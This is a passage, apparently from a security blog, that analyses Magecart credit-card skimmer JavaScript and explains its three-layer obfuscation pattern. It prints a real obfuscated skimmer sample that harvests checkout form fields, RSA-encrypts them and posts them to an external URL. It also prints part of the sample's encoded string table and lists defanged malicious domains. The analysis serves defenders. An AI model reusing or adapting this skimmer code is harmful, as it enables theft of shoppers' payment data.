      el <span class="token operator">=</span> _0x4a60b2<span class="token punctuation">[</span>_0x1e5f96<span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token string">"id"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      pos <span class="token operator">=</span> el<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x10"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x11"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span>pos <span class="token operator">></span> <span class="token number">0x0</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x57a5b3 <span class="token operator">=</span> el<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x12"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token number">0x0</span><span class="token punctuation">,</span> pos<span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x57a5b3<span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0x553440 <span class="token operator">=</span> _0x57a5b3<span class="token punctuation">;</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x11"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x1f7150<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x16"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x17"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x136215<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x18"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x19"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x4ab22b<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1b"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x4df1f0<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x16"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x16"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1c"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x90cd50<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x18"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x18"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1d"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x188c28<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">try</span> <span class="token punctuation">{</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x553440 <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1e"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span>
    <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x32a59b<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token keyword">var</span> _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">==</span> <span class="token number">0xf</span> <span class="token operator">&&</span> _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">0x3</span><span class="token punctuation">)</span>
      _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x1</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x13"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">></span> <span class="token number">0xf</span> <span class="token operator">&&</span> _0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">>=</span> <span class="token number">0x3</span><span class="token punctuation">)</span>
      _0x1e9e38 <span class="token operator">=</span> <span class="token number">0x1</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x1e9e38<span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> _0xe078a8 <span class="token operator">=</span> <span class="token punctuation">[</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x1f"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x20"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x21"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x22"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x23"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x24"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x25"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x26"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x27"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
      <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x28"</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
    <span class="token punctuation">]</span><span class="token punctuation">;</span>
    _0x570cfd <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">var</span> _0x1e5f96 <span class="token operator">=</span> <span class="token number">0x0</span><span class="token punctuation">;</span> _0x1e5f96 <span class="token operator"><</span> _0x570cfd<span class="token punctuation">;</span> _0x1e5f96<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
      _0x553440 <span class="token operator">=</span> _0xe078a8<span class="token punctuation">[</span>_0x1e5f96<span class="token punctuation">]</span><span class="token punctuation">;</span>
      k <span class="token operator">=</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x29"</span><span class="token punctuation">)</span> <span class="token operator">+</span> _0x553440<span class="token punctuation">;</span>
      <span class="token keyword">try</span> <span class="token punctuation">{</span>
        _0x34f9e9<span class="token punctuation">[</span>_0x553440<span class="token punctuation">]</span> <span class="token operator">=</span> document<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x14"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x15"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
      <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x12e01e<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x27"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x1e9e38<span class="token punctuation">)</span> <span class="token punctuation">{</span>
      _0x34f9e9 <span class="token operator">=</span> <span class="token constant">JSON</span><span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2a"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">if</span> <span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">==</span> vvk<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x5"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token keyword">return</span><span class="token punctuation">;</span>
      vvk <span class="token operator">=</span> _0x34f9e9<span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x4c73bd <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">XMLHttpRequest</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      url <span class="token operator">=</span> <span class="token string">"ht"</span> <span class="token operator">+</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2b"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2c"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2d"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> url <span class="token operator">+</span> <span class="token string">""</span><span class="token punctuation">,</span> <span class="token operator">!</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2e"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x2f"</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x30"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0xd96713 <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">JSEncrypt</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0xd96713<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x31"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x32"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
      <span class="token keyword">var</span> _0x5dc551 <span class="token operator">=</span> _0xd96713<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x33"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span>_0x34f9e9<span class="token punctuation">)</span><span class="token punctuation">;</span>
      _0x4c73bd<span class="token punctuation">[</span><span class="token function">_0x47fb</span><span class="token punctuation">(</span><span class="token string">"0x34"</span><span class="token punctuation">)</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token string">"k="</span> <span class="token operator">+</span> _0x5dc551<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
  <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span>_0x2661d6<span class="token punctuation">)</span> <span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>

The obfuscated code doesn’t make a lot of sense at first, but upon closer inspection we can see that it has a structure that repeats across many different Magecart scripts that we have analyzed. It uses two main techniques.

1.Javascript syntax manipulation

This involves using any number of Javascript language tricks to manipulate data (e.g., using non-decimal values for strings and numbers, randomizing variable names, using chained commas in return statements, etc.)

2.Common Obfuscation Pattern

This is a common JavaScript obfuscation pattern that we see repeated across many different Magecart attack scripts.

More Magecart samples:

  • //cdndeskpro[.]com/mc[.]js
  • //listrakjs[.]com/api[.]js
  • //lightgetjs[.]com/light[.]js

The Magecart Pattern

Magecart code uses a classic obfuscation technique, which is also used by several legitimate obfuscation services. This technique is effective, but once you understand the common pattern, you can de-obfuscate it and uncover the logic.

The pattern contains three layers:

  1. Content Layer a set of data tokens, that requires a decryption step, to become the real data values
  2. Decryption Layer A function that gets a data key as a parameter (from the Logic layer) and gets the corresponding data token from the Content layer. The function decrypts the data token using a dedicated algorithm (e.g window.atob) to retrieve the original data value.
  3. Logic Layer The actual malware code. This code gets real the data values for its execution by calling the Decryption layer8 with *data keys.

Pattern Overview

Image 27

Notes

  • Some obfuscation techniques don’t have a Content layer. In such cases, the Decryption layer is parsing data tokens directly from the Logic layer
  • Some obfuscation techniques might have more than one decryption function.

Example:

<span class="token comment">//Content</span>
<span class="token keyword">const</span> dataTokens <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">"cGF0dGVybg=="</span><span class="token punctuation">,</span> <span class="token string">"aGVsbG8="</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

<span class="token punctuation">(</span><span class="token keyword">function</span> <span class="token function">prepareContent</span><span class="token punctuation">(</span><span class="token parameter">_dataTokens<span class="token punctuation">,</span> shiftCount</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">for</span> <span class="token punctuation">(</span><span class="token keyword">let</span> i <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> i <span class="token operator"><</span> shiftCount<span class="token punctuation">;</span> i<span class="token operator">++</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    _dataTokens<span class="token punctuation">.</span><span class="token function">push</span><span class="token punctuation">(</span>_dataTokens<span class="token punctuation">.</span><span class="token function">shift</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">(</span>dataTokens<span class="token punctuation">,</span> <span class="token number">0x1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token comment">//Decryption</span>
<span class="token keyword">function</span> <span class="token function">getRealValue</span><span class="token punctuation">(</span><span class="token parameter">dataKey</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">const</span> realValue <span class="token operator">=</span> <span class="token function">atob</span><span class="token punctuation">(</span>dataTokens<span class="token punctuation">[</span>dataKey<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> realValue<span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token comment">//Logic</span>
<span class="token function">run</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function">run</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  console<span class="token punctuation">.</span><span class="token function">log</span><span class="token punctuation">(</span><span class="token function">getRealValue</span><span class="token punctuation">(</span><span class="token number">0x0</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">" "</span> <span class="token operator">+</span> <span class="token function">getRealValue</span><span class="token punctuation">(</span><span class="token number">0x1</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">//"hello pattern"</span>
<span class="token punctuation">}</span>

Content:

  • dataTokens – an array of data tokens (cGF0dGVybg==, aGVsbG8=)
  • prepareContent – a function that shifting the array once

Decryption

  • getString(): a function that gets a data key from the Logic layer, retrieves the correlative data token from the Content layer, and then executes window.atob on the data token to get the real data value.

Logic

  • Prints “hello pattern” using data keys (0x0, 0x1)
  • getRealValue(0x0) -> “hello”
  • getRealValue(0x1) -> “pattern”

Magecart Pattern Analysis

Now let’s analyze the Magecart attack code seen above using this pattern (Content, Decryption, Logic)

  • Content

    • 0x34d5: an array of _data tokens
    • There is a preparation step that is shifting the array 165 times (0xa5 === 165).
<span class="token keyword">var</span> _0x34d5 <span class="token operator">=</span> <span class="token punctuation">[</span>
  <span class="token string">"Q29udGVudC1UeXBl"</span><span class="token punctuation">,</span>
  <span class="token string">"YXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVk"</span><span class="token punctuation">,</span>
  <span class="token string">"c2V0UHVibGljS2V5"</span><span class="token punctuation">,</span>
  <span class="token string">"TUlJRUlqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0JBOEFNSUlFQ2dLQ0JBRUF3NTZoY3Z1R25QZHZaM0hGQWtLN1QyR2EweTJaS2hkdjJhVG9SU1BzbWtFRVAyR2RsY1FrTTY4a0VXeHliWXBDWG45eXg5OFJxTFNNYStDUjYvUkZKaFZMUVNLdHkrNm16U2IyTURSYitUVks3NWpCN1F5aGZ6TVdacFYySlBzdGFyMGxxRkxwR3owdFJIS1lTY1h0VnZnNWVUWThtcjZ0dXlZK0VHTEw1SFd3UzFqSnBtaHNEN0RxZGQ1TTkxbElRemVtTU5nNWp2RktNclNlU1NSQlFZR1lSRDFWekVremEra3A2UVdlS1ZocWVVL0xFdFlZYUU4SlRlWGwzV1E2UExVNmZleXJndlFrN0MxeEhmeEVTVWx2UVl6aFlsbmt0clVBTmxxQVRyQ2JyTGtDL0oyNWx0T08vY2lsb0xKV3I0TWFHbERWU01FS1ZLYTNsQUt6SlJoNUd4SkovWDB2M0hzT0hsVUR5aW5ZdlA0eGpBWXRnWFZoYVBLbldDelNndjV2eWpmdEczQWlmZHlsOVFLejRuejZKRS9lOXE2YjhhNGdCM25kNm4xVDlVdklpNXhpdHhzZHBPNDVwWm1uN0dXQTgxOUJORElTZHNIcEcvSG9LL080N2xZTXFoRHJHWVhoZ2oxZWNodmJLSXJOdGxZMGZmd1U3QzYxR1l5TGVLbzF1aWhkU0gvaUF3czZyY25iWXFNM0hXN3RibncyaDhOZm1haVVZcDF3ek1oZ0ozQ3grVHhjcXdGTU0wU01LajF1SHVsSWo0MTg0WVJFMW5weEl3T1VSd3FENnJNbko0WXZqMFl2ZnZMQmJJN1krZ1N3YTJoTHJqbEJwN0V6b3VqdjBaSjRyOWdhK3ZIQmpkVUNtcmlONVNla3RJaWd4R3hRbklaWG1MWTdVTExkdmtoNlY4N2VMVi83ODF3eW1YbmVPaEtTblN6TmdXRU5ZNERMTDcvdGdzUnVxQW9tb0xHa0phTEorWmpBZ29hMno3cXdkUFc4d3liMW12L29qL3hadzA2d3Z2NVZPZlhvTXBjcTFUMkxldjl4T2FuL0dkeGREUytLSlJkQkZYL1c4WS9Ydi9wM0ZRQUpCdS95QXVaM0RoMjh4V1FubE1WczJBazZWbGdGQTdoK1ljZjBvVkpLTno0WDllMExGNUc2TGtTWXgxU1ZMV1ZqNWQ4VkVXNnFhNnN0QStFRERURXhhTUt6Y2pjYzhSc09SUXN0TTkxR2MrbEYvaHA3NndTb0pFeGVBMjNYL1g3dXI0allrUlpueElZSWxxMnFxRkVqYko4WjdnUE0rQ25neXpJM2pnZmhaai9aeVJDaHFtNlc2dFRkRlppdU0wVFdZTExjTE1TUklVZ1E1ajU3SkFydXFiZ2VJOXZaYUR1My9GQzZwRXYvc2tqUDZBN09qcXcrdFBiRzFndkg0dmJjM21nQ3NjRVFZUXozQUFGTVduakZyR2dBU1hETzZGTDk5dkxkdXRsS3NKV01TU2RuMktUaFQ4a3luMTA5V0dUc0syeDg5MEFOU3JmQ01pQ2d4UWN1U2wzUGdFRUZ0Unh0MFNpVDQybDNSWmY0UEVncXFUMVlkSVZkYzV3Sm4xOVhWNkdubDJqWDRieGZmMjdyUUFneDRQVXFvL3V6dG8yeTFrNU42WXpVTFh5dFF4MEpNcXQ3MEFVVnRkZzg0S29uckpZMmY1YUxVM0pVTWVrUmM0bDE3dHJVU1J0alZhN2FZdXh0cGo3K2wvckcwTUtWM0ZYYS9TeE11WDVWcmM4Ky8xUkdKcy9HVFY3Q2VhcHcxUUFtWm9BVnhRSURBUUFC"</span><span class="token punctuation">,</span>
  <span class="token string">"ZW5jcnlwdA=="</span><span class="token punctuation">,</span>
  <span class="token string">"c2VuZA=="</span><span class="token punctuation">,</span>
  <span class="token string">"cGxhY2Vfb3JkZXI="</span><span class="token punctuation">,</span>
  <span class="token string">"cGxhY2Utb3JkZXI="</span><span class="token punctuation">,</span>
  <span class="token string">"cGF5bWVudC1idXR0b25zLWNvbnRhaW5lcg=="</span><span class="token punctuation">,</span>
  <span class="token string">"YmlsbGluZy1idXR0b25zLWNvbnRhaW5lcg=="</span><span class="token punctuation">,</span>
  <span class="token string">"cmV2aWV3LWJ1dHRvbnMtY29udGFpbmVy"</span><span class="token punctuation">,</span>
  <span class="token string">"bGVuZ3Ro"</span><span class="token punctuation">,</span>
  <span class="token string">"W2lkKj0n"</span><span class="token punctuation">,</span>
  <span class="token string">"cXVlcnlTZWxlY3RvckFsbA=="</span><span class="token punctuation">,</span>
  <span class="token string">"YWRkRXZlbnRMaXN0ZW5lcg=="</span><span class="token punctuation">,</span>
  <span class="token string">"Y2xpY2s="</span><span class="token punctuation">,</span>
  <span class="token string">"YnRuLWNoZWNrb3V0"</span><span class="token punctuation">,</span>
  <span class="token string">"W2NsYXNzKj0n"</span><span class="token punctuation">,</span>
  <span class="token string">"bG9hZA=="</span><span class="token punctuation">,</span>
  <span class="token string">"aG9zdG5hbWU="</span><span class="token punctuation">,</span>
  <span class="token string">"bG9jYXRpb24="</span><span class="token punctuation">,</span>
  <span class="token string">"aW5wdXQ="</span><span class="token punctuation">,</span>
  <span class="token string">"aW5kZXhPZg=="</span><span class="token punctuation">,</span>
